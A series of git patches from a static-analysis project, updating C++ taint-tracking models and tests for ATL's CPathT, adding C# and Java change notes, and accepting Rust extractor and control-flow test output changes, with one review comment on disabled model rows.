b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp index d8f5da01633..0fb0456daa4 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp @@ -682,11 +682,11 @@ void test_CPathT() { CPath p2; p2 += p; - sink(p.m_strPath); // $ ir + sink(p2.m_strPath); // $ MISSING: ir CPath p3; p3 += x; - sink(p.m_strPath); // $ ir + sink(p3.m_strPath); // $ MISSING: ir } { diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected b/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected index c8a2ee98665..41c3822aed5 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected 
@@ -761,28 +761,20 @@ WARNING: module 'TaintTracking' has been deprecated and may be removed in future | atl.cpp:679:11:679:11 | call to CPathT | atl.cpp:680:5:680:5 | p | | | atl.cpp:679:11:679:11 | call to CPathT | atl.cpp:681:10:681:10 | p | | | atl.cpp:679:11:679:11 | call to CPathT | atl.cpp:684:11:684:11 | p | | -| atl.cpp:679:11:679:11 | call to CPathT | atl.cpp:685:10:685:10 | p | | -| atl.cpp:679:11:679:11 | call to CPathT | atl.cpp:689:10:689:10 | p | | | atl.cpp:680:5:680:5 | ref arg p | atl.cpp:681:10:681:10 | p | | | atl.cpp:680:5:680:5 | ref arg p | atl.cpp:684:11:684:11 | p | | -| atl.cpp:680:5:680:5 | ref arg p | atl.cpp:685:10:685:10 | p | | -| atl.cpp:680:5:680:5 | ref arg p | atl.cpp:689:10:689:10 | p | | | atl.cpp:680:14:680:14 | ref arg x | atl.cpp:688:11:688:11 | x | | | atl.cpp:680:14:680:14 | ref arg x | atl.cpp:694:15:694:15 | x | | | atl.cpp:680:14:680:14 | ref arg x | atl.cpp:699:24:699:24 | x | | | atl.cpp:680:14:680:14 | ref arg x | atl.cpp:705:30:705:30 | x | | | atl.cpp:681:10:681:10 | p [post update] | atl.cpp:684:11:684:11 | p | | -| atl.cpp:681:10:681:10 | p [post update] | atl.cpp:685:10:685:10 | p | | -| atl.cpp:681:10:681:10 | p [post update] | atl.cpp:689:10:689:10 | p | | -| atl.cpp:681:12:681:20 | ref arg m_strPath | atl.cpp:685:12:685:20 | m_strPath | | -| atl.cpp:681:12:681:20 | ref arg m_strPath | atl.cpp:689:12:689:20 | m_strPath | | | atl.cpp:683:11:683:12 | call to CPathT | atl.cpp:684:5:684:6 | p2 | | +| atl.cpp:683:11:683:12 | call to CPathT | atl.cpp:685:10:685:11 | p2 | | +| atl.cpp:684:5:684:6 | ref arg p2 | atl.cpp:685:10:685:11 | p2 | | | atl.cpp:684:11:684:11 | call to operator char *& | atl.cpp:684:8:684:8 | call to operator+= | TAINT | -| atl.cpp:684:11:684:11 | ref arg p | atl.cpp:685:10:685:10 | p | | -| atl.cpp:684:11:684:11 | ref arg p | atl.cpp:689:10:689:10 | p | | -| atl.cpp:685:10:685:10 | p [post update] | atl.cpp:689:10:689:10 | p | | -| atl.cpp:685:12:685:20 | ref arg m_strPath | 
atl.cpp:689:12:689:20 | m_strPath | | | atl.cpp:687:11:687:12 | call to CPathT | atl.cpp:688:5:688:6 | p3 | | +| atl.cpp:687:11:687:12 | call to CPathT | atl.cpp:689:10:689:11 | p3 | | +| atl.cpp:688:5:688:6 | ref arg p3 | atl.cpp:689:10:689:11 | p3 | | | atl.cpp:688:11:688:11 | ref arg x | atl.cpp:694:15:694:15 | x | | | atl.cpp:688:11:688:11 | ref arg x | atl.cpp:699:24:699:24 | x | | | atl.cpp:688:11:688:11 | ref arg x | atl.cpp:705:30:705:30 | x | | From c3086d4ecda3b5c8ba986fb89c9c7ad408daad3b Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Tue, 3 Dec 2024 19:13:00 +0000 Subject: [PATCH 0785/1267] C++: Fix models and accept test changes. --- cpp/ql/lib/ext/CPathT.model.yml | 7 ++++--- .../dataflow/external-models/flow.expected | 10 +++++----- .../dataflow/external-models/validatemodels.expected | 1 - cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp | 4 ++-- 4 files changed, 11 insertions(+), 11 deletions(-) diff --git a/cpp/ql/lib/ext/CPathT.model.yml b/cpp/ql/lib/ext/CPathT.model.yml index 2138dd6c942..8211343d479 100644 --- a/cpp/ql/lib/ext/CPathT.model.yml +++ b/cpp/ql/lib/ext/CPathT.model.yml @@ -3,7 +3,7 @@ extensions: pack: codeql/cpp-all extensible: summaryModel data: # namespace, type, subtypes, name, signature, ext, input, output, kind, provenance - - ["", "CPathT", True, "CPathT", "", "", "Argument[*1]", "Argument[-1]", "value", "manual"] + - ["", "CPathT", True, "CPathT", "", "", "Argument[*0]", "Argument[-1]", "value", "manual"] - ["", "CPathT", True, "AddExtension", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] - ["", "CPathT", True, "Append", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] - ["", "CPathT", True, "Combine", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] 
@@ -18,5 +18,6 @@ extensions: # - ["", "CPathT", True, "operator const T&", "", "", "Argument[-1]", "ReturnValue[*]", "value", "manual"] # - ["", "CPathT", True, "operator T&", "", "", "Argument[-1]", "ReturnValue[*]", "value", "manual"] - ["", "CPathT", True, "operator PCXSTR", "", "", "Argument[-1]", "ReturnValue[*]", "value", "manual"] - - ["", "CPathT", True, "operator +=", "", "", "Argument[-1]", "ReturnValue[*]", "value", "manual"] - - ["", "CPathT", True, "operator +=", "", "", "Argument[*0]", "ReturnValue[*]", "value", "manual"] + - ["", "CPathT", True, "operator+=", "", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] + - ["", "CPathT", True, "operator+=", "", "", "Argument[*0]", "ReturnValue[*]", "taint", "manual"] + - ["", "CPathT", True, "operator+=", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] diff --git a/cpp/ql/test/library-tests/dataflow/external-models/flow.expected b/cpp/ql/test/library-tests/dataflow/external-models/flow.expected index 3c5b69b09f4..a8a3e5a209a 100644 --- a/cpp/ql/test/library-tests/dataflow/external-models/flow.expected +++ b/cpp/ql/test/library-tests/dataflow/external-models/flow.expected 
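Review bot: The two commented-out conversion-operator rows (`operator const T&`, `operator T&`) kept above the renamed `operator+=` entries have no explanation, while the atl.cpp change in this same commit records that `p2 += p` followed by `sink(p2.m_strPath)` is still `MISSING: ir` because the conversion operator cannot yet be modelled. That is a known false negative for taint reaching one `CPathT` through another, and it should be stated where the model lives, not only in the test. I would add above the disabled rows: `# Disabled: conversion operators can't be modelled in MaD yet, so taint from a CPathT right-hand side of operator+= is lost (see test_CPathT in atl.cpp)`. That the disabled rows are the operator the test comment names is inferred from their names, and the list begins outside this hunk.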
@@ -11,14 +11,14 @@ edges | asio_streams.cpp:100:44:100:62 | call to buffer | asio_streams.cpp:103:29:103:39 | *send_buffer | provenance | Sink:MaD:6 | | asio_streams.cpp:100:64:100:71 | *send_str | asio_streams.cpp:56:18:56:23 | [summary param] *0 in buffer | provenance | | | asio_streams.cpp:100:64:100:71 | *send_str | asio_streams.cpp:100:44:100:62 | call to buffer | provenance | MaD:10 | -| test.cpp:4:5:4:11 | [summary param] 0 in ymlStep | test.cpp:4:5:4:11 | [summary] to write: ReturnValue in ymlStep | provenance | MaD:809 | -| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:7:10:7:18 | call to ymlSource | provenance | Src:MaD:807 | -| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:11:10:11:10 | x | provenance | Sink:MaD:808 | +| test.cpp:4:5:4:11 | [summary param] 0 in ymlStep | test.cpp:4:5:4:11 | [summary] to write: ReturnValue in ymlStep | provenance | MaD:810 | +| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:7:10:7:18 | call to ymlSource | provenance | Src:MaD:808 | +| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:11:10:11:10 | x | provenance | Sink:MaD:809 | | test.cpp:7:10:7:18 | call to ymlSource | test.cpp:13:18:13:18 | x | provenance | | | test.cpp:13:10:13:16 | call to ymlStep | test.cpp:13:10:13:16 | call to ymlStep | provenance | | -| test.cpp:13:10:13:16 | call to ymlStep | test.cpp:15:10:15:10 | y | provenance | Sink:MaD:808 | +| test.cpp:13:10:13:16 | call to ymlStep | test.cpp:15:10:15:10 | y | provenance | Sink:MaD:809 | | test.cpp:13:18:13:18 | x | test.cpp:4:5:4:11 | [summary param] 0 in ymlStep | provenance | | -| test.cpp:13:18:13:18 | x | test.cpp:13:10:13:16 | call to ymlStep | provenance | MaD:809 | +| test.cpp:13:18:13:18 | x | test.cpp:13:10:13:16 | call to ymlStep | provenance | MaD:810 | nodes | asio_streams.cpp:56:18:56:23 | [summary param] *0 in buffer | semmle.label | [summary param] *0 in buffer | | asio_streams.cpp:56:18:56:23 | [summary] to write: ReturnValue in buffer | semmle.label | [summary] to write: 
ReturnValue in buffer | diff --git a/cpp/ql/test/library-tests/dataflow/external-models/validatemodels.expected b/cpp/ql/test/library-tests/dataflow/external-models/validatemodels.expected index 166d834ea76..39dade25325 100644 --- a/cpp/ql/test/library-tests/dataflow/external-models/validatemodels.expected +++ b/cpp/ql/test/library-tests/dataflow/external-models/validatemodels.expected @@ -1,4 +1,3 @@ -| Dubious member name "operator +=" in summary model. | | Dubious member name "operator BSTR" in summary model. | | Dubious member name "operator LPCSTR" in summary model. | | Dubious member name "operator LPSAFEARRAY" in summary model. | diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp index 0fb0456daa4..a6638ad3f56 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp @@ -682,11 +682,11 @@ void test_CPathT() { CPath p2; p2 += p; - sink(p2.m_strPath); // $ MISSING: ir + sink(p2.m_strPath); // $ MISSING: ir // this requires flow through `operator StringType&()` which we can't yet model in MaD CPath p3; p3 += x; - sink(p3.m_strPath); // $ MISSING: ir + sink(p3.m_strPath); // $ ir } { From 5042753b29f5048f098264321a4efba8cce7bc1e Mon Sep 17 00:00:00 2001 From: Anders Schack-Mulligen Date: Wed, 4 Dec 2024 10:20:43 +0100 Subject: [PATCH 0786/1267] C#/Java: Add change notes. --- .../change-notes/2024-12-04-dataflow-type-pruning-tweak.md | 4 ++++ .../change-notes/2024-12-04-dataflow-type-pruning-tweak.md | 4 ++++ 2 files changed, 8 insertions(+) create mode 100644 csharp/ql/lib/change-notes/2024-12-04-dataflow-type-pruning-tweak.md create mode 100644 java/ql/lib/change-notes/2024-12-04-dataflow-type-pruning-tweak.md diff --git a/csharp/ql/lib/change-notes/2024-12-04-dataflow-type-pruning-tweak.md b/csharp/ql/lib/change-notes/2024-12-04-dataflow-type-pruning-tweak.md new file mode 100644 index 00000000000..258c0e5326b 
--- /dev/null
+++ b/csharp/ql/lib/change-notes/2024-12-04-dataflow-type-pruning-tweak.md
@@ -0,0 +1,4 @@
+---
+category: minorAnalysis
+---
+* The data flow library has been updated to track types in a slightly different way: The type of the tainted data (which may be stored into fields, etc.) is tracked more precisely, while the types of intermediate containers for nested contents is tracked less precisely. This may have a slight effect on false positives for complex flow paths.
diff --git a/java/ql/lib/change-notes/2024-12-04-dataflow-type-pruning-tweak.md b/java/ql/lib/change-notes/2024-12-04-dataflow-type-pruning-tweak.md
new file mode 100644
index 00000000000..258c0e5326b
--- /dev/null
+++ b/java/ql/lib/change-notes/2024-12-04-dataflow-type-pruning-tweak.md
@@ -0,0 +1,4 @@
+---
+category: minorAnalysis
+---
+* The data flow library has been updated to track types in a slightly different way: The type of the tainted data (which may be stored into fields, etc.) is tracked more precisely, while the types of intermediate containers for nested contents is tracked less precisely. This may have a slight effect on false positives for complex flow paths.
From 66e4acf53eea14097955c2c06fad07005eff6083 Mon Sep 17 00:00:00 2001
From: Paolo Tranquilli Date: Wed, 4 Dec 2024 10:56:14 +0100 Subject: [PATCH 0787/1267] Rust: accept test changes --- .../canonical_path/canonical_paths.expected | 2 +- .../generated/BoxPat/BoxPat_getPat.expected | 2 +- .../IdentPat/IdentPat_getPat.expected | 2 +- .../generated/LetExpr/LetExpr_getPat.expected | 2 +- .../generated/LetStmt/LetStmt_getPat.expected | 2 +- .../MatchArm/MatchArm_getPat.expected | 4 +- .../generated/OrPat/OrPat_getPat.expected | 2 +- .../generated/RefPat/RefPat_getPat.expected | 2 +- .../TupleStructPat/TupleStructPat.expected | 6 +- .../TupleStructPat_getField.expected | 14 +- .../TupleStructPat_getPath.expected | 6 +- .../controlflow-unstable/Cfg.expected | 6 +- .../library-tests/controlflow/Cfg.expected | 68 +++++----- .../dataflow/local/DataFlowStep.expected | 68 +++++----- .../dataflow/local/inline-flow.expected | 36 ++--- .../dataflow/models/models.expected | 6 +- .../test/library-tests/variables/Cfg.expected | 128 +++++++++--------- 17 files changed, 178 insertions(+), 178 deletions(-) diff --git a/rust/ql/test/extractor-tests/canonical_path/canonical_paths.expected b/rust/ql/test/extractor-tests/canonical_path/canonical_paths.expected index 09583dcf9f6..7b6cb391556 100644 --- a/rust/ql/test/extractor-tests/canonical_path/canonical_paths.expected +++ b/rust/ql/test/extractor-tests/canonical_path/canonical_paths.expected @@ -62,5 +62,5 @@ resolvedPaths | regular.rs:54:9:54:25 | Variant3 {...} | repo::test | crate::regular::MyEnum::Variant3 | | regular.rs:58:11:58:11 | e | None | None | | regular.rs:59:9:59:24 | ...::Variant1 | repo::test | crate::regular::MyEnum::Variant1 | -| regular.rs:60:9:60:27 | ...::Variant2(...) | repo::test | crate::regular::MyEnum::Variant2 | +| regular.rs:60:9:60:27 | TupleStructPat | repo::test | crate::regular::MyEnum::Variant2 | | regular.rs:61:9:61:31 | ...::Variant3 {...} | repo::test | crate::regular::MyEnum::Variant3 | 
diff --git a/rust/ql/test/extractor-tests/generated/BoxPat/BoxPat_getPat.expected b/rust/ql/test/extractor-tests/generated/BoxPat/BoxPat_getPat.expected index a43975657a8..4e12432652d 100644 --- a/rust/ql/test/extractor-tests/generated/BoxPat/BoxPat_getPat.expected +++ b/rust/ql/test/extractor-tests/generated/BoxPat/BoxPat_getPat.expected @@ -1,2 +1,2 @@ -| gen_box_pat.rs:6:9:6:27 | box ... | gen_box_pat.rs:6:13:6:27 | ...::Some(...) | +| gen_box_pat.rs:6:9:6:27 | box ... | gen_box_pat.rs:6:13:6:27 | TupleStructPat | | gen_box_pat.rs:7:9:7:24 | box ...::None | gen_box_pat.rs:7:13:7:24 | ...::None | diff --git a/rust/ql/test/extractor-tests/generated/IdentPat/IdentPat_getPat.expected b/rust/ql/test/extractor-tests/generated/IdentPat/IdentPat_getPat.expected index 3c2fd2dc379..2e2f0d9228e 100644 --- a/rust/ql/test/extractor-tests/generated/IdentPat/IdentPat_getPat.expected +++ b/rust/ql/test/extractor-tests/generated/IdentPat/IdentPat_getPat.expected @@ -1 +1 @@ -| gen_ident_pat.rs:10:9:10:25 | y | gen_ident_pat.rs:10:11:10:25 | ...::Some(...) | +| gen_ident_pat.rs:10:9:10:25 | y | gen_ident_pat.rs:10:11:10:25 | TupleStructPat | diff --git a/rust/ql/test/extractor-tests/generated/LetExpr/LetExpr_getPat.expected b/rust/ql/test/extractor-tests/generated/LetExpr/LetExpr_getPat.expected index b935bd98013..7c31e314128 100644 --- a/rust/ql/test/extractor-tests/generated/LetExpr/LetExpr_getPat.expected +++ b/rust/ql/test/extractor-tests/generated/LetExpr/LetExpr_getPat.expected @@ -1 +1 @@ -| gen_let_expr.rs:5:8:5:31 | let ... = maybe_some | gen_let_expr.rs:5:12:5:18 | Some(...) | +| gen_let_expr.rs:5:8:5:31 | let ... = maybe_some | gen_let_expr.rs:5:12:5:18 | TupleStructPat | diff --git a/rust/ql/test/extractor-tests/generated/LetStmt/LetStmt_getPat.expected b/rust/ql/test/extractor-tests/generated/LetStmt/LetStmt_getPat.expected index cd4c3f8cc64..758837c946d 100644 --- a/rust/ql/test/extractor-tests/generated/LetStmt/LetStmt_getPat.expected 
+++ b/rust/ql/test/extractor-tests/generated/LetStmt/LetStmt_getPat.expected @@ -3,4 +3,4 @@ | gen_let_stmt.rs:7:5:7:15 | let ... | gen_let_stmt.rs:7:9:7:9 | x | | gen_let_stmt.rs:8:5:8:10 | let ... | gen_let_stmt.rs:8:9:8:9 | x | | gen_let_stmt.rs:9:5:9:24 | let ... = ... | gen_let_stmt.rs:9:9:9:14 | TuplePat | -| gen_let_stmt.rs:10:5:12:6 | let ... = ... else {...} | gen_let_stmt.rs:10:9:10:15 | Some(...) | +| gen_let_stmt.rs:10:5:12:6 | let ... = ... else {...} | gen_let_stmt.rs:10:9:10:15 | TupleStructPat | diff --git a/rust/ql/test/extractor-tests/generated/MatchArm/MatchArm_getPat.expected b/rust/ql/test/extractor-tests/generated/MatchArm/MatchArm_getPat.expected index d4adba7f838..9928555fc32 100644 --- a/rust/ql/test/extractor-tests/generated/MatchArm/MatchArm_getPat.expected +++ b/rust/ql/test/extractor-tests/generated/MatchArm/MatchArm_getPat.expected @@ -1,4 +1,4 @@ -| gen_match_arm.rs:6:9:6:29 | ... => y | gen_match_arm.rs:6:9:6:23 | ...::Some(...) | +| gen_match_arm.rs:6:9:6:29 | ... => y | gen_match_arm.rs:6:9:6:23 | TupleStructPat | | gen_match_arm.rs:7:9:7:26 | ...::None => 0 | gen_match_arm.rs:7:9:7:20 | ...::None | -| gen_match_arm.rs:10:9:10:35 | ... if ... => ... | gen_match_arm.rs:10:9:10:15 | Some(...) | +| gen_match_arm.rs:10:9:10:35 | ... if ... => ... | gen_match_arm.rs:10:9:10:15 | TupleStructPat | | gen_match_arm.rs:11:9:11:15 | _ => 0 | gen_match_arm.rs:11:9:11:9 | _ | diff --git a/rust/ql/test/extractor-tests/generated/OrPat/OrPat_getPat.expected b/rust/ql/test/extractor-tests/generated/OrPat/OrPat_getPat.expected index 9e50c27e035..22ebce5dde5 100644 --- a/rust/ql/test/extractor-tests/generated/OrPat/OrPat_getPat.expected +++ b/rust/ql/test/extractor-tests/generated/OrPat/OrPat_getPat.expected 
@@ -1,2 +1,2 @@ -| gen_or_pat.rs:6:9:6:38 | ... \| ...::None | 0 | gen_or_pat.rs:6:9:6:23 | ...::Some(...) | +| gen_or_pat.rs:6:9:6:38 | ... \| ...::None | 0 | gen_or_pat.rs:6:9:6:23 | TupleStructPat | | gen_or_pat.rs:6:9:6:38 | ... \| ...::None | 1 | gen_or_pat.rs:6:27:6:38 | ...::None | diff --git a/rust/ql/test/extractor-tests/generated/RefPat/RefPat_getPat.expected b/rust/ql/test/extractor-tests/generated/RefPat/RefPat_getPat.expected index 029fd9fa172..d4f78daeb82 100644 --- a/rust/ql/test/extractor-tests/generated/RefPat/RefPat_getPat.expected +++ b/rust/ql/test/extractor-tests/generated/RefPat/RefPat_getPat.expected @@ -1,2 +1,2 @@ -| gen_ref_pat.rs:6:9:6:28 | &mut ... | gen_ref_pat.rs:6:14:6:28 | ...::Some(...) | +| gen_ref_pat.rs:6:9:6:28 | &mut ... | gen_ref_pat.rs:6:14:6:28 | TupleStructPat | | gen_ref_pat.rs:7:9:7:21 | &...::None | gen_ref_pat.rs:7:10:7:21 | ...::None | diff --git a/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat.expected b/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat.expected index 9e9de534b1e..9a180d2a3d7 100644 --- a/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat.expected +++ b/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat.expected 
@@ -1,3 +1,3 @@ -| gen_tuple_struct_pat.rs:6:9:6:27 | Tuple(...) | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasPath: | yes | getNumberOfFields: | 4 | -| gen_tuple_struct_pat.rs:7:9:7:20 | Tuple(...) | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasPath: | yes | getNumberOfFields: | 2 | -| gen_tuple_struct_pat.rs:8:9:8:17 | Tuple(...) | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasPath: | yes | getNumberOfFields: | 1 | +| gen_tuple_struct_pat.rs:6:9:6:27 | TupleStructPat | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasPath: | yes | getNumberOfFields: | 4 | +| gen_tuple_struct_pat.rs:7:9:7:20 | TupleStructPat | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasPath: | yes | getNumberOfFields: | 2 | +| gen_tuple_struct_pat.rs:8:9:8:17 | TupleStructPat | hasResolvedPath: | no | hasResolvedCrateOrigin: | no | hasPath: | yes | getNumberOfFields: | 1 | diff --git a/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat_getField.expected b/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat_getField.expected index 21e1a701963..5885cbcea3e 100644 --- a/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat_getField.expected +++ b/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat_getField.expected 
@@ -1,7 +1,7 @@ -| gen_tuple_struct_pat.rs:6:9:6:27 | Tuple(...) | 0 | gen_tuple_struct_pat.rs:6:15:6:17 | "a" | -| gen_tuple_struct_pat.rs:6:9:6:27 | Tuple(...) | 1 | gen_tuple_struct_pat.rs:6:20:6:20 | 1 | -| gen_tuple_struct_pat.rs:6:9:6:27 | Tuple(...) | 2 | gen_tuple_struct_pat.rs:6:23:6:23 | 2 | -| gen_tuple_struct_pat.rs:6:9:6:27 | Tuple(...) | 3 | gen_tuple_struct_pat.rs:6:26:6:26 | 3 | -| gen_tuple_struct_pat.rs:7:9:7:20 | Tuple(...) | 0 | gen_tuple_struct_pat.rs:7:15:7:16 | .. | -| gen_tuple_struct_pat.rs:7:9:7:20 | Tuple(...) | 1 | gen_tuple_struct_pat.rs:7:19:7:19 | 3 | -| gen_tuple_struct_pat.rs:8:9:8:17 | Tuple(...) | 0 | gen_tuple_struct_pat.rs:8:15:8:16 | .. | +| gen_tuple_struct_pat.rs:6:9:6:27 | TupleStructPat | 0 | gen_tuple_struct_pat.rs:6:15:6:17 | "a" | +| gen_tuple_struct_pat.rs:6:9:6:27 | TupleStructPat | 1 | gen_tuple_struct_pat.rs:6:20:6:20 | 1 | +| gen_tuple_struct_pat.rs:6:9:6:27 | TupleStructPat | 2 | gen_tuple_struct_pat.rs:6:23:6:23 | 2 | +| gen_tuple_struct_pat.rs:6:9:6:27 | TupleStructPat | 3 | gen_tuple_struct_pat.rs:6:26:6:26 | 3 | +| gen_tuple_struct_pat.rs:7:9:7:20 | TupleStructPat | 0 | gen_tuple_struct_pat.rs:7:15:7:16 | .. | +| gen_tuple_struct_pat.rs:7:9:7:20 | TupleStructPat | 1 | gen_tuple_struct_pat.rs:7:19:7:19 | 3 | +| gen_tuple_struct_pat.rs:8:9:8:17 | TupleStructPat | 0 | gen_tuple_struct_pat.rs:8:15:8:16 | .. | diff --git a/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat_getPath.expected b/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat_getPath.expected index 34f30ed8ae1..0c07d081720 100644 --- a/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat_getPath.expected +++ b/rust/ql/test/extractor-tests/generated/TupleStructPat/TupleStructPat_getPath.expected 
@@ -1,3 +1,3 @@ -| gen_tuple_struct_pat.rs:6:9:6:27 | Tuple(...) | gen_tuple_struct_pat.rs:6:9:6:13 | Tuple | -| gen_tuple_struct_pat.rs:7:9:7:20 | Tuple(...) | gen_tuple_struct_pat.rs:7:9:7:13 | Tuple | -| gen_tuple_struct_pat.rs:8:9:8:17 | Tuple(...) | gen_tuple_struct_pat.rs:8:9:8:13 | Tuple | +| gen_tuple_struct_pat.rs:6:9:6:27 | TupleStructPat | gen_tuple_struct_pat.rs:6:9:6:13 | Tuple | +| gen_tuple_struct_pat.rs:7:9:7:20 | TupleStructPat | gen_tuple_struct_pat.rs:7:9:7:13 | Tuple | +| gen_tuple_struct_pat.rs:8:9:8:17 | TupleStructPat | gen_tuple_struct_pat.rs:8:9:8:13 | Tuple | diff --git a/rust/ql/test/library-tests/controlflow-unstable/Cfg.expected b/rust/ql/test/library-tests/controlflow-unstable/Cfg.expected index 7a7d9884f19..4260e2384c8 100644 --- a/rust/ql/test/library-tests/controlflow-unstable/Cfg.expected +++ b/rust/ql/test/library-tests/controlflow-unstable/Cfg.expected @@ -14,10 +14,10 @@ edges | test.rs:6:12:6:31 | [boolean(false)] ... && ... | test.rs:9:13:9:17 | false | false | | test.rs:6:12:6:31 | [boolean(true)] ... && ... | test.rs:7:13:7:13 | d | true | | test.rs:6:17:6:31 | let ... = b | test.rs:6:31:6:31 | b | | -| test.rs:6:21:6:27 | Some(...) | test.rs:6:12:6:31 | [boolean(false)] ... && ... | no-match | -| test.rs:6:21:6:27 | Some(...) | test.rs:6:26:6:26 | d | match | +| test.rs:6:21:6:27 | TupleStructPat | test.rs:6:12:6:31 | [boolean(false)] ... && ... | no-match | +| test.rs:6:21:6:27 | TupleStructPat | test.rs:6:26:6:26 | d | match | | test.rs:6:26:6:26 | d | test.rs:6:12:6:31 | [boolean(true)] ... && ... | match | -| test.rs:6:31:6:31 | b | test.rs:6:21:6:27 | Some(...) | | +| test.rs:6:31:6:31 | b | test.rs:6:21:6:27 | TupleStructPat | | | test.rs:6:33:8:9 | { ... } | test.rs:6:9:10:9 | if ... {...} else {...} | | | test.rs:7:13:7:13 | d | test.rs:6:33:8:9 | { ... } | | | test.rs:8:16:10:9 | { ... } | test.rs:6:9:10:9 | if ... {...} else {...} | | 
diff --git a/rust/ql/test/library-tests/controlflow/Cfg.expected b/rust/ql/test/library-tests/controlflow/Cfg.expected index 3165b2354be..5137e2f8b89 100644 --- a/rust/ql/test/library-tests/controlflow/Cfg.expected +++ b/rust/ql/test/library-tests/controlflow/Cfg.expected @@ -191,11 +191,11 @@ edges | test.rs:98:27:98:28 | 10 | test.rs:98:24:98:28 | 1..10 | | | test.rs:99:9:103:9 | while ... { ... } | test.rs:97:25:104:5 | { ... } | | | test.rs:99:15:99:39 | let ... = ... | test.rs:99:29:99:32 | iter | | -| test.rs:99:19:99:25 | Some(...) | test.rs:99:9:103:9 | while ... { ... } | no-match | -| test.rs:99:19:99:25 | Some(...) | test.rs:99:24:99:24 | x | match | +| test.rs:99:19:99:25 | TupleStructPat | test.rs:99:9:103:9 | while ... { ... } | no-match | +| test.rs:99:19:99:25 | TupleStructPat | test.rs:99:24:99:24 | x | match | | test.rs:99:24:99:24 | x | test.rs:100:17:100:17 | x | match | | test.rs:99:29:99:32 | iter | test.rs:99:29:99:39 | ... .next(...) | | -| test.rs:99:29:99:39 | ... .next(...) | test.rs:99:19:99:25 | Some(...) | | +| test.rs:99:29:99:39 | ... .next(...) | test.rs:99:19:99:25 | TupleStructPat | | | test.rs:99:41:103:9 | { ... } | test.rs:99:15:99:39 | let ... = ... | | | test.rs:100:13:102:13 | if ... {...} | test.rs:99:41:103:9 | { ... } | | | test.rs:100:17:100:17 | x | test.rs:100:22:100:22 | 5 | | 
@@ -274,10 +274,10 @@ edges | test.rs:137:48:143:5 | { ... } | test.rs:137:5:143:5 | exit fn test_if_let_else (normal) | | | test.rs:138:9:142:9 | if ... {...} else {...} | test.rs:137:48:143:5 | { ... } | | | test.rs:138:12:138:26 | let ... = a | test.rs:138:26:138:26 | a | | -| test.rs:138:16:138:22 | Some(...) | test.rs:138:21:138:21 | n | match | -| test.rs:138:16:138:22 | Some(...) | test.rs:141:13:141:13 | 0 | no-match | +| test.rs:138:16:138:22 | TupleStructPat | test.rs:138:21:138:21 | n | match | +| test.rs:138:16:138:22 | TupleStructPat | test.rs:141:13:141:13 | 0 | no-match | | test.rs:138:21:138:21 | n | test.rs:139:13:139:13 | n | match | -| test.rs:138:26:138:26 | a | test.rs:138:16:138:22 | Some(...) | | +| test.rs:138:26:138:26 | a | test.rs:138:16:138:22 | TupleStructPat | | | test.rs:138:28:140:9 | { ... } | test.rs:138:9:142:9 | if ... {...} else {...} | | | test.rs:139:13:139:13 | n | test.rs:138:28:140:9 | { ... } | | | test.rs:140:16:142:9 | { ... } | test.rs:138:9:142:9 | if ... {...} else {...} | | 
@@ -290,10 +290,10 @@ edges | test.rs:146:9:148:9 | ExprStmt | test.rs:146:12:146:26 | let ... = a | | | test.rs:146:9:148:9 | if ... {...} | test.rs:149:9:149:9 | 0 | | | test.rs:146:12:146:26 | let ... = a | test.rs:146:26:146:26 | a | | -| test.rs:146:16:146:22 | Some(...) | test.rs:146:9:148:9 | if ... {...} | no-match | -| test.rs:146:16:146:22 | Some(...) | test.rs:146:21:146:21 | n | match | +| test.rs:146:16:146:22 | TupleStructPat | test.rs:146:9:148:9 | if ... {...} | no-match | +| test.rs:146:16:146:22 | TupleStructPat | test.rs:146:21:146:21 | n | match | | test.rs:146:21:146:21 | n | test.rs:147:13:147:21 | ExprStmt | match | -| test.rs:146:26:146:26 | a | test.rs:146:16:146:22 | Some(...) | | +| test.rs:146:26:146:26 | a | test.rs:146:16:146:22 | TupleStructPat | | | test.rs:147:13:147:20 | return n | test.rs:145:5:150:5 | exit fn test_if_let (normal) | return | | test.rs:147:13:147:21 | ExprStmt | test.rs:147:20:147:20 | n | | | test.rs:147:20:147:20 | n | test.rs:147:13:147:20 | return n | | 
